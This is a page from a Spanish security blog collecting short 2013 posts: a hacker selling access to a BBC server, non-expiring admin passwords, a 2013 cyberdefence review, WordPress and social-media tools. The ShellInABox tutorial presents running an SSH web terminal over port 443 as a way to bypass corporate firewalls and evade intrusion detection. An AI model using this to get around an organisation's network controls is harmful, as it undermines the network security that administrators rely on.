Hacker ruso entra en un servidor de la BBC

<div class="article-caption" style="text-align: justify;"> <h2> <span style="font-size: small;">Un hacker ruso mantuvo el control de uno delos servidores informáticos de la Corporación Británica de Radio BBC durante un tiempo y trató de vender el acceso a ese servidor a otros delincuentes cibernéticos.</span><br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSno6mc_LBMrNzWnSjgQGHO91P3j6OcwcOkd_9M1zRQUziHs8cZgocaiWwuQ77X2YaanHu6nmiGK3YuxFi6RdTKjM17B4UL_XZDttVlU9pVo9SzhY6Gd9yVMep_Ob3r_eQXxvBHUVHkRpS/s1600/BBC_Hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSno6mc_LBMrNzWnSjgQGHO91P3j6OcwcOkd_9M1zRQUziHs8cZgocaiWwuQ77X2YaanHu6nmiGK3YuxFi6RdTKjM17B4UL_XZDttVlU9pVo9SzhY6Gd9yVMep_Ob3r_eQXxvBHUVHkRpS/s400/BBC_Hacked.jpg" width="400" /></a></div> </h2> </div> <div id="p_10" style="text-align: justify;"> <span>Según informó la firma norteamericana Hold Security, sus colaboradores detectaron al hacker la semana pasada cuando alardeaba de su éxito en uno de los foros del mercado negro. Sin embargo se desconoce si logró vender la información antes de que la BBC reaccionara a la señal.</span></div> <div id="p_10" style="text-align: justify;"> <br /></div> <div id="p_20"> Los representantes de la BBC declararon que la Corporación no hace comentarios sobre preguntas de seguridad.</div> <div id="p_20"> </div> <div id="p_20"> <span id="ctrlcopy"></span></div> <div id="p_20"> </div> <div id="p_20"> </div> <div id="p_20"> <br /><span id="ctrlcopy"></span><span id="ctrlcopy"><a href="http://spanish.ruvr.ru/news/2013_12_31/Hacker-ruso-entra-en-un-servidor-de-la-BBC-8935/" target="_blank">Fuente</a></span></div>

Un hacker ruso mantuvo el control de uno delos servidores informáticos de la Corporación Británica de Radio BBC durante un tiempo y trat...

Leer más »

Cuentas de administrador con contraseña que no expira

<div style="text-align: justify;"> En una encuesta completamente no científica que realicé durante una presentación reciente de <i>TechEd</i>, pregunté cuanta gente que tiene credenciales de administración de dominio tienen también configurado su cuenta de administrador para que esté exenta de la política de contraseñas que requiere cambios periódicos.<br /> <br /> La respuesta fue una risa nerviosa.<br /> <br /> Mientras que algunas organizaciones tienen políticas estrictas respecto del cambio de contraseñas, el forzado de esas políticas a menudo es inconsistente. A menor tamaño del departamento de TI, menos probable que los usuarios privilegiados sean estrictos en adherir políticas de seguridad tales como cambiar regularmente la contraseña de las cuentas privilegiadas.</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixC_oKHU6AlSkAeTaay2tzkJx7v_tEKrvlUidmPzGKW1zAADLeXnJKodDbpafVcuER0sGczSnu6Ib9kODI7HtsE9j-tpBt32GNa6TVg4_uBi7miRvTkTjtvG2eEh1KqGQlqMVr4rSI4oZa/s1600/AV_Bypass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF45lkhA9E7sUvK0KzQIkL0KtlrDKyd5UWtFi6WWl_5XQNPyqk7Gs8cjcBk1X-KS_NLugMWWHNvFezwyrg08mFFI4reWh9ngUMETb9pro-likd2sZf7gjWXZWDK5PagQI4AF14CUZKHkql/s1600/Hacking+Etico.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF45lkhA9E7sUvK0KzQIkL0KtlrDKyd5UWtFi6WWl_5XQNPyqk7Gs8cjcBk1X-KS_NLugMWWHNvFezwyrg08mFFI4reWh9ngUMETb9pro-likd2sZf7gjWXZWDK5PagQI4AF14CUZKHkql/s400/Hacking+Etico.png" width="400" /></a></div> <div style="text-align: justify;"> <br /> <br /> ¿Porqué? Probablemente porque nadie salvo los propios administradores podrían percatarse que la política está siendo violada.<br /> <br /> En tanto continúe la tendencia inevitable de administradores únicos a manejar cada vez más computadoras, el tamaño del departamento de TI de muchas organizaciones se ha ido reduciendo. Mientras una compañía con 1500 personas hace diez años tendría un pequeño equipo de administradores, la misma compañía podría tener hoy uno o dos solamente.<br /> <br /> Con la reducción del tamaño de la administración viene la reducción de la supervisión entre pares. “<i>Quis custodiet ipsos custodes</i>” (<i>¿quien vigila a los vigilantes?</i>) es una pregunta fácil de responder cuando los vigilantes se controlan unos a otros, mucho menos fácil de responder si solo hay uno o dos vigilantes. Quizás en grandes equipos de TI son mejores con el auto-control cuando se trata de cumplimiento de políticas de seguridad sencillamente porque hay más presión entre pares.<br /> <br /> Si bien hay consultas que se pueden ejecutar en el Centro de Administración de Directorio Activo para determinar cuales cuentas no han cambiado recientemente su contraseña, esta no es una tarea que sea probable que la ejecute nadie fuera del equipo de administración.<br /> <br /> Mientras que algunos administradores pueden encogerse de hombros y decidir que si bien esa es una mala práctica, hay poco riesgo para ellos porque se aseguran que nadie los mire por encima del hombro cuando ingresan su contraseña. La realidad es que como el autor de ciencia ficción señala en un blog reciente (http://www.antipope.org/charlie/blog-static/2013/12/trust-me.html ), los <i>keyloggers</i> se están haciendo pequeños, pueden ser dispositivos USB pasantes e incluso pueden formar parte del propio teclado. A menos que un administrador verifique su computadora cada vez en busca de la presencia de tales dispositivos, alguien que trabaje en la misma organización podría poner tal dispositivo físicamente en la computadora del administrador (otro buen argumento para el doble factor de autenticación para las cuentas privilegiadas.)<br /> <br /> Al final de cuentas si uno selecciona la opción "la contraseña no expira nunca" eso depende de uno. Habilitándole se reduce la seguridad de su organización y con el advenimiento de cuentas de servicio administradas, hay menos razones para usar contraseñas estáticas con cualquier cuenta de usuario.<br /> <br /> <b>Traducción: <a href="https://twitter.com/rfb_">Raúl Batista</a> - <a href="http://www.segu-info.com.ar/">Segu-Info</a></b><br /> Autor: <a href="http://windowsitpro.com/blogger/orin-thomas"><b>Orin Thomas</b></a><br /> Fuente: <a href="http://windowsitpro.com/blog/administrator-accounts-passwords-dont-expire"><b>Windows IT Pro</b></a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

En una encuesta completamente no científica que realicé durante una presentación reciente de TechEd , pregunté cuanta gente que tiene cred...

Leer más »

Nuevo algoritmo para deducir la identidad de personas en fotos no etiquetadas de redes sociales

<div style="text-align: justify;"> Un nuevo algoritmo puede que revolucione la forma en que encontramos fotos entre las miles de millones que hay desperdigadas por redes sociales como Facebook y servicios para compartir fotos como Flickr.<br /><br />Desarrollado por Parham Aarabi y Ron Appel, de la Universidad de Toronto en Canadá, la herramienta de búsqueda utiliza las ubicaciones de otras etiquetas de fotos para cuantificar las relaciones entre los individuos que aparecen en las fotos, incluso aquellos que no están etiquetados en ninguna foto.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv47P1c2hGIERbNUZaXHv7v5FyCFmtte9c3bWMS8lmojXi0evKxk6314NDwF4JkQQnIdaSMtOm7Y1Q9QP4EajE34XJ5n9BqwFodI17EED-GviMfPrCD1BB5zPi6orQoYI-5Z_WNH7h7PAy/s1600/img_17431.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv47P1c2hGIERbNUZaXHv7v5FyCFmtte9c3bWMS8lmojXi0evKxk6314NDwF4JkQQnIdaSMtOm7Y1Q9QP4EajE34XJ5n9BqwFodI17EED-GviMfPrCD1BB5zPi6orQoYI-5Z_WNH7h7PAy/s400/img_17431.jpg" width="400" /></a></div> <div style="text-align: justify;"> <br /><br />Imagínese que coloca en una red social una foto en la que usted y su madre fueron retratados juntos, construyendo un castillo de arena en la playa. En la siguiente foto, usted y su padre están comiendo sandía.<br /><br />A raíz de las etiquetas en una y otra foto, el algoritmo puede determinar que existe una relación entre su padre y su madre aunque no aparezcan juntos en ninguna de esas dos fotos.<br /><br />En una tercera foto, usted hace volar una cometa junto a su padre y su madre, pero sólo ésta está etiquetada.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Sin embargo, cuando usted busque fotos de su padre el algoritmo puede presentarle esa foto en la que él no está etiquetado. El algoritmo lo consigue basándose en que hay muchas probabilidades de que él esté ahí retratado.<br /><br />El hábil algoritmo alcanza una alta fiabilidad, y lo logra sin valerse de ningún software de reconocimiento facial o de objetos, reduciendo así de manera drástica su consumo de recursos computacionales.<br /><br /><a class="target_blank" href="http://www.ece.utoronto.ca/news/aarabi-algorithm-finds-you/" rel="nofollow" target="_blank">Información adicional</a> </div>

Un nuevo algoritmo puede que revolucione la forma en que encontramos fotos entre las miles de millones que hay desperdigadas por redes so...

Leer más »

Cómo acceder a un terminal SSH desde el navegador web

<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQWfwveait6NfgV4fGk0MYlyPupuYQ8lsMLXWZKk1X3JEGkeg4ELe1IjBHBUaxFkDe6C2iteBMJIqpZKJdV1NvKtOf7QnS01Hwkc1e7lhFnbZYpHbzXM_t2It5tZ8jWnpYiSNtuAahN3gm/s1600/Shellinabox2.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQWfwveait6NfgV4fGk0MYlyPupuYQ8lsMLXWZKk1X3JEGkeg4ELe1IjBHBUaxFkDe6C2iteBMJIqpZKJdV1NvKtOf7QnS01Hwkc1e7lhFnbZYpHbzXM_t2It5tZ8jWnpYiSNtuAahN3gm/s200/Shellinabox2.jpg" width="200" /></a></div> <div style="text-align: justify;"> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Normalmente en las empresas los firewalls perimetrales sólo permiten el tráfico HTTP(s) hacia Internet. Hoy vamos a ver otra herramienta para poder evadir esta restricción y poder ejecutar un <b>terminal SSH a través del navegador</b>: <a href="http://code.google.com/p/shellinabox/" target="_blank">Shell In A Box</a> (o ShellInABox).</span></span><br /><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"></span></span><br /><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"></span></span><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">ShellInABox es un emulador de terminal web basado en ajax para cualquier navegador que soporte Javascript y CSS sin necesidad de disponer de ningún plugin adicional.</span></span><br /><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Existen otros emuladores para navegador mediante complementos como NaCl o FireSSH, si bien necesitarás acceso al exterior por el puerto 22/TCP.  Con ShellInABox accederás directamente al puerto 443/TCP de HTTPS.</span></span><br /><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"></span></span><br /><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"></span></span><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Ahora bien, ¿por qué no cambiar el puerto del demonio SSH del 22/TCP al 443/TCP y dejarnos de tanta historia? Pues principalmente porque no tendrás necesidad de utilizar otro cliente como Putty y porque muchos firewalls con inspección de paquetes detectarían el intercambio de claves al menos que lo ofuscemos con ossh y Potty. </span></span></div> <div style="text-align: justify;"> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"> </span></span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCD7uGLVTrltBTJlK5OKn7Px-6z1r5rYssjSJ-H977cZ_aW_zkGXl4iPn3M8OXOrsWaj_3Ty0DLRr5fQFOE4woEbGNi4gbcTGTxEssU73Ap-lZQPXiKGA5HvxkN0R6VtaXeSsOLXha-5wU/s1600/ssh01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCD7uGLVTrltBTJlK5OKn7Px-6z1r5rYssjSJ-H977cZ_aW_zkGXl4iPn3M8OXOrsWaj_3Ty0DLRr5fQFOE4woEbGNi4gbcTGTxEssU73Ap-lZQPXiKGA5HvxkN0R6VtaXeSsOLXha-5wU/s400/ssh01.jpg" width="400" /></a></div> <div style="text-align: justify;"> <br /><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"></span></span><br /><a href="http://www.blogger.com/null" name="more"></a><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Al instalar certificados SSL/TTL, ShellInABox cifrará todas las comunicaciones cliente-servidor y también hará más difícil la labor de detección de los firewalls/NIDS más "inteligentes".</span></span><br /><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"></span></span><br /><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"></span></span><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">En esta entrada vamos a probar a instalar ShellInABox en un máquina virtual con Kali Linux:</span></span></div> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><br /></span></span> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">root@kali:~# apt-get install openssl shellinabox</span></span><br /> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"><br /></span></span> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Por defecto, el servidor web shellinboxd escuchará en el puerto 4200/TCP. Para modificarlo simplemente lo cambiaremos en el fichero de configuración:</span></span><br /> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><br /></span></span> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">root@kali:~# vi /etc/default/shellinabox</span></span><br /> <pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code># Should shellinaboxd start automatically SHELLINABOX_DAEMON_START=1 # TCP port that shellinboxd's webserver listens on SHELLINABOX_PORT=<span style="background-color: yellow;">443</span> # Parameters that are managed by the system and usually should not need # changing: # SHELLINABOX_DATADIR=/var/lib/shellinabox # SHELLINABOX_USER=shellinabox # SHELLINABOX_GROUP=shellinabox # Any optional arguments (e.g. extra service definitions).  Make sure # that that argument is quoted. # #   Beeps are disabled because of reports of the VLC plugin crashing #   Firefox on Linux/x86_64. SHELLINABOX_ARGS="--no-beep"</code></pre> <br /> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Durante la instalación, si no encuentra un certificado adecuado, shellinaboxd intenta crear uno nuevo autofirmado (certificate.pem) mediante openssl. En ese caso el certificado creado se ubica en /var/lib/shellinabox. Si por lo que sea no se ha creado correctamente podéis <a href="http://www.hackplayers.com/2012/10/como-crear-un-certificado-ssl-auto-firmado.html" target="_blank">crearlo vosotros mismos</a>.</span></span><br /> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"><br /></span></span> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Para empezar a utilizarlo, simplemente iniciaremos los servicios:</span></span><br /> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"><br /></span></span> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">root@kali:~# service ssh start</span></span><br /> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">[ ok ] Starting OpenBSD Secure Shell server: sshd.</span></span><br /> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><br /></span></span> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">root@kali:~# service shellinabox start </span></span><br /> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">root@kali:~# service shellinabox status</span></span><br /> <span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">Shell In A Box Daemon is running</span></span><br /> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"><br /></span></span> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Y comprobamos el acceso a través de nuestro navegador:</span></span><br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA6aPPREUjOiToKYSO3ttCcTRxDvKz2TMTvjEdAkRldQY2aY00SDjSz6W6zVr3Iik1utABuAY_m3K5xoH6NbrYKL5HeCLZ1z4AD2i6RTsND93tt8FNDJYBkLi2ZIKI7iFypyTdPVlBj52l/s1600/shellinabox_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA6aPPREUjOiToKYSO3ttCcTRxDvKz2TMTvjEdAkRldQY2aY00SDjSz6W6zVr3Iik1utABuAY_m3K5xoH6NbrYKL5HeCLZ1z4AD2i6RTsND93tt8FNDJYBkLi2ZIKI7iFypyTdPVlBj52l/s400/shellinabox_1.png" width="400" /></a></div> <b><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;"> </span></span></b><br /> <b><span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">Fuentes y referencias:</span></span></b><br /> <span style="font-family: Verdana,sans-serif;"><span style="font-size: x-small;">- <a href="http://code.google.com/p/shellinabox/" target="_blank">shellinabox - Web based AJAX terminal emulator</a>  <br />- <a href="http://xmodulo.com/2013/09/access-ssh-terminal-web-browser-linux.html" target="_blank">How to access ssh terminal in web browser on Linux</a> <br />- <a href="http://www.tecmint.com/shell-in-a-box-a-web-based-ssh-terminal-to-access-remote-linux-servers/" target="_blank">Shell In A Box – A Web-Based SSH Terminal to Access Remote Linux Servers </a><br />- <a href="http://www.hackplayers.com/2013/09/tunel-tcp-traves-de-http-mediante-tunna.html" target="_blank">Crea un tunel TCP a través de HTTP mediante Tunna</a> <br />- <a href="http://www.hackplayers.com/2013/09/evadir-un-portal-cautivo-mediante-un.html" target="_blank">Evadir un portal cautivo mediante un túnel DNS</a> <br />- <a href="http://blog.desdelinux.net/como-crear-un-tunel-ssh-entre-un-servidor-linux-y-un-cliente-windows/" target="_blank">Cómo crear un túnel SSH entre un servidor Linux y un cliente Windows</a> </span></span>

Normalmente en las empresas los firewalls perimetrales sólo permiten el tráfico HTTP(s) hacia Internet. Hoy vamos a ver otra herramient...

Leer más »

Resumen Ciberdefensa 2013

<div style="text-align: justify;"> El 2013 se acaba, como es habitual en estas fechas todos los medios especializados de diferentes temáticas que sea se lanzan a elaborar el resumen del año. Nosotros no hemos querido ser menos y en esta entrada intentaremos sintetizar los hechos mas relevantes en el mundo de la Ciberdefensa<br /> <br /> Podríamos llamar al 2013 como el año en que conocimos cómo funcionaban realmente las amenazas persistentes avanzadas y las provenientes de actores de nivel estatal. </div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijIBiOBKqKTI-l66-g5w_-tnYfGXco9kYwti5cyzeKTmQdIAy1KG2xBmVBy8ODxFp0MXg03SQUuxywMyqLTmKVZ3AMxHUAkfNDoPbIsPw427u-P4wpT53q75Vcyqiqzjg9Fl5rA_0PsTQi/s1600/DiaDSeg_hi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijIBiOBKqKTI-l66-g5w_-tnYfGXco9kYwti5cyzeKTmQdIAy1KG2xBmVBy8ODxFp0MXg03SQUuxywMyqLTmKVZ3AMxHUAkfNDoPbIsPw427u-P4wpT53q75Vcyqiqzjg9Fl5rA_0PsTQi/s400/DiaDSeg_hi.jpg" width="400" /></a></div> <div style="text-align: justify;"> <br /> <br /> En febrero de 2013, Mandiant publicó el informe "<a href="http://intelreport.mandiant.com/" rel="nofollow" target="_blank">APT1: Exposing One of China's Cyber Espionage Units</a>" argumentando que las actividades de la unidad 61.398 del Ejército de Liberación Popular de China se correspondían con las del grupo conocido como APT1. APT1 es un término utilizado por Mandiant para designar un grupo de personas que son responsables de un conjunto particular de las amenazas persistentes avanzadas. Por primera vez se ponía nombre y apellidos a la presunción de que el gobierno chino estaba detrás de diversas campañas de espionaje a través de Internet.<br /> <br /> Cuando todas las miradas acusadoras apuntaban a China apareció Edward Joseph Snowden. Contratista tecnológico estadounidense, antiguo empleado de la Agencia Central de Inteligencia (CIA) y de la Agencia de Seguridad Nacional (NSA). En junio de 2013, Snowden hizo públicos, a través de los periódicos The Guardian y The Washington Post, documentos clasificados como alto secreto sobre varios programas de la NSA, incluyendo el programa de vigilancia PRISM con la colaboración de redes sociales, la interceptación masiva de los backbones de fibra óptica que componen internet entre otros.<br /> <br /> <a href="https://www.eff.org/nsa-spying/nsadocs" rel="nofollow" target="_blank">Durante el año se fueron sucediendo nuevas relevaciones</a> tanto de detalles técnicos de operaciones de la NSA como de las implicaciones políticas de las mismas.<br /> <br /> A pesar de haber transcurrido ya algún tiempo desde su descubrimiento el malware Stuxnet siguió dando de qué hablar. El <a href="http://www.langner.com/en/2013/11/20/langner%E2%80%99s-final-stuxnet-analysis-comes-with-surprises/" rel="nofollow" target="_blank">Final report (Análisis final) de Langner</a> sobre Stuxnet viene con varias sorpresas que requieren una re-evaluación de la operación "<a href="http://en.wikipedia.org/wiki/Operation_Olympic_Games" rel="nofollow" target="_blank">Olympic Games</a>". El informe, que resume tres años de investigación y que incluye imágenes de material de archivo de la planta de Natanz, viene con un completo análisis de una versión previa del ataque de Stuxnet contra los controladores Siemens S7-417. Explica el sistema de protección usado en la cascada de centrifugadoras y pone los dos ataques en el contexto, para llegar a conclusiones sobre el cambio de prioridades durante la operación.<br /> <br /> Durante el año se detectaron diversas campañas de ataques mediante malware dirigido que podrían tener un origen gubernamental por el tipo de objetivo pero sigue sin conocerse realmente quien esta detrás de estos incidentes. Entre otros <a href="http://blog.segu-info.com.ar/2013/03/minuduke-backdoor-escrito-en-assembler.html" rel="nofollow" target="_blank">Miniduke</a>, <a href="http://blog.segu-info.com.ar/2013/06/nettraveler-nuevo-apt-que-afecta-varios.html" rel="nofollow" target="_blank">NetTraveler</a> (también conocido como "NetFile") y TeamSpy.<br /> <br /> La compleja Guerra Civil Siria siguió teniendo su reflejo en internet. Los diversos bandos y facciones hicieron uso propagandístico de la red. Siendo el mas destacado el autodenominado <i>'Syrian Electronic Army'</i> (formado por partidarios del presidente Bashar-al-Assad). En abril, se atribuyeron la responsabilidad por hackear la cuenta de Twitter de la Associated Press emitiendo la falsa noticia de explosiones en la Casa Blanca - que arrastro momentáneamente el índice DOW JONES. En julio, el grupo comprometido las cuentas de Gmail de tres empleados de la Casa Blanca y de la cuenta de Twitter de Thomson-Reuters. <br /> <br /> Fuente: <a href="http://www.areopago21.org/2013/12/resumen-ciberdefensa-2013.html" rel="nofollow" target="_blank">Areópago21</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

El 2013 se acaba, como es habitual en estas fechas todos los medios especializados de diferentes temáticas que sea se lanzan a elaborar el...

Leer más »

WordPress 3.8, grandes cambios de diseño y uso en dispositivos móviles

<div style="text-align: justify;"> Y reseñamos los cambios estéticos de esta nueva versión de<b> <a href="http://wordpress.org/news/2013/12/parker/" rel="nofollow" target="_blank">WordPress 3.8 "Parker"</a></b>, (panel de administración, tipografías, nuevo tema por defecto estilo “magazine”, iconos, etc), ya que a nivel de seguridad no se ha proporcionado ninguna información por parte de WordPress.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji1lXx-Yvi0fk24fsf-57oe5NtPButo_ZUbgnpd4LQohxwPx3vvRIo41LRTE-4o0tp5HUoWQvAnNphZzaG27TQAEq2l5l8q9ZmDeJEhhNBAVNZkiDNXM7aBT-9l8X4vsXI8Yi5TBw0-B6m/s1600/WordPress-Logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji1lXx-Yvi0fk24fsf-57oe5NtPButo_ZUbgnpd4LQohxwPx3vvRIo41LRTE-4o0tp5HUoWQvAnNphZzaG27TQAEq2l5l8q9ZmDeJEhhNBAVNZkiDNXM7aBT-9l8X4vsXI8Yi5TBw0-B6m/s320/WordPress-Logo.png" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> Pero viendo los tickets cerrados <a href="http://core.trac.wordpress.org/timeline" rel="nofollow" target="_blank">en el trac</a>, os <b>recomendamos actualizar ya</b>, ante posibles futuras vulnerabilidades respecto a versiones anteriores en los próximos días.<br /> Cabe destacar el esfuerzo realizado para la<b> adaptación a cualquier tipo de dispositivo</b>, con especial énfasis en los móviles y tablets, por lo que la publicación será más ágil y rápida desde cualquier lugar.<br /> <br /> Fuente: <a href="http://www.daboweb.com/2013/12/12/liberado-wordpress-3-8-con-grandes-cambios-de-diseno/" rel="nofollow" target="_blank">Daboweb</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Y reseñamos los cambios estéticos de esta nueva versión de WordPress 3.8 "Parker" , (panel de administración, tipografías, nue...

Leer más »

Una manera simple de editar nuestras fotografías en Facebook

<div style="text-align: justify;"> Si deseamos tener para nuestras fotografías de Facebook herramientas básicas de edición o un kit de efectos para darle un toque especial, podemos considerar esta extensión para Chrome que comentaremos hoy.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ2rQT2hV2aICuY__-T3HJlUIhBYHeZ0JEAswJXNQZEBGmulPKYVusB-mBNn1AXfLogKlHhX8wSkff7aRrvy3citLrrU9Wmm_F97EAiLPobh2424fWY_VSboqGAg1MQ-IMtReTEoKgDAx5/s1600/photon.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ2rQT2hV2aICuY__-T3HJlUIhBYHeZ0JEAswJXNQZEBGmulPKYVusB-mBNn1AXfLogKlHhX8wSkff7aRrvy3citLrrU9Wmm_F97EAiLPobh2424fWY_VSboqGAg1MQ-IMtReTEoKgDAx5/s400/photon.jpg" width="400" /></a></div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> No es una opción nueva, ya que la conocemos desde hace tiempo con otro nombre, pero ahora la encontraremos como <a href="https://chrome.google.com/webstore/detail/photon-facebook-photo-edi/ihhdcjefkafghalpbdjebmfnjbgfgkpo">Photon</a>. Con solo integrarla al navegador contaremos con un interesante editor de fotografías en nuestra cuenta de Facebook.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Solo tenemos que abrir la fotografía en el visor para que encontremos todas las opciones que nos ofrece el Photo Editor de Aviary.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Entre las opciones tenemos aquellas que nos permiten redimensionar la fotografía, rotar, recortar, agregar brillo, contraste, entre otras alternativas. También podemos agregar diferentes marcos, pasando por un abanico de estilo. Y si deseamos darle un toque divertido entonces podemos agregar algunos de los stickers que contiene la aplicación.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Podemos agregar texto o utilizar diferentes pinceles para dibujar sobre la fotografía. O podemos recurrir a la sección dedicada a los filtros, donde encontraremos 20 diferentes opciones. Y como una ayuda adicional, contamos con la herramienta de zoom para ver en detalle diferentes partes de la fotografía.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Una vez que hemos realizado la edición de nuestra imagen, podemos guardarla en nuestro equipo o actualizarla en nuestra cuenta de Facebook.</div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> <a href="http://wwwhatsnew.com/2013/12/28/una-manera-simple-de-editar-nuestras-fotografias-en-facebook/" target="_blank">Fuente </a></div> <div style="text-align: justify;"> <br /></div>

Si deseamos tener para nuestras fotografías de Facebook herramientas básicas de edición o un kit de efectos para darle un toque especial, ...

Leer más »

Typify nos crea una página personal integrando las redes sociales

<div style="text-align: justify;"> Si estamos buscando una forma interesante de crear y presentar una página personal, podemos tener en cuenta a <a href="https://www.typify.io/">Typify</a>.</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_4T-olFpy0c76WW2fxFGnrPGDjCflpURu4uIk4pV-3X6lVVxNnveO6qTacncjYVJucUn6mwgBdwV_Sz9MhiLlnDrWSPUzzrNQvCsEpFmULG8lb-Dpb969zWcDPR9HYZE72EYqQfQkzHLl/s1600/Typify.io-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_4T-olFpy0c76WW2fxFGnrPGDjCflpURu4uIk4pV-3X6lVVxNnveO6qTacncjYVJucUn6mwgBdwV_Sz9MhiLlnDrWSPUzzrNQvCsEpFmULG8lb-Dpb969zWcDPR9HYZE72EYqQfQkzHLl/s400/Typify.io-1.jpg" width="400" /></a></div> <div style="text-align: justify;"> <br /></div> <div style="text-align: justify;"> Es un servicio web que nos permite reflejar en una sola página toda nuestra personalidad y dinámica a través de las redes sociales en las que participamos. Esto nos presenta grandes ventajas, ya que nuestra página estará constantemente actualizada (dependiendo nuestra participación en las redes sociales) sin que tener que realizar ningún esfuerzo extra.</div> <div style="text-align: justify;"> <br /></div> 